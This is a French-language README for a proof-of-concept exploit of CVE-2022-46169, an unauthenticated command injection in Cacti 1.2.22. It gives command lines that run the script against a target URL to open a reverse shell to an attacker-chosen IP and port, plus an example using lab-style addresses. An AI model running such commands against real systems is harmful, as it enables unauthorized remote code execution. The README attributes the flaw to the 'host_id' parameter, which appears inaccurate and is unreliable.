
PoC for CVE-2022-46169 that affects Cacti 1.2.22 version
Ceci est un script de preuve de concept (POC) pour la vulnérabilité CVE-2022-46169 qui affecte Cacti version 1.2.22.
La vulnérabilité CVE-2022-46169 permet une injection de commande sans authentification dans les versions de Cacti jusqu'à la 1.2.22, permettant une exécution de code à distance sans authentification en tant qu'utilisateur www-data. La vulnérabilité est causée par une validation incorrecte de l'entrée utilisateur dans le paramètre "host_id" du fichier "remote_agent.php".
python CVE-2022-46169.py --url <TARGET_URL> --ip <YOUR_IP> --port <YOUR_PORT>
Remplacez <TARGET_URL> par l'URL de l'installation Cacti cible, <YOUR_IP> par l'adresse IP de la machine sur laquelle vous souhaitez recevoir le reverse shell, et <YOUR_PORT> par le numéro de port sur lequel vous souhaitez recevoir le reverse shell.
Exemple :
python CVE-2022-46169.py --url http://10.10.11.211 --ip 10.10.14.5 --port 1337
Ce script POC est uniquement à des fins éducatives. Utilisez-le à vos propres risques. L'auteur de ce script n'est pas responsable des dommages causés par l'utilisation de ce script.
Références
CVE-2022-46169 - Entrée CVE pour la vulnérabilité.
Avis de sécurité Cacti sur Github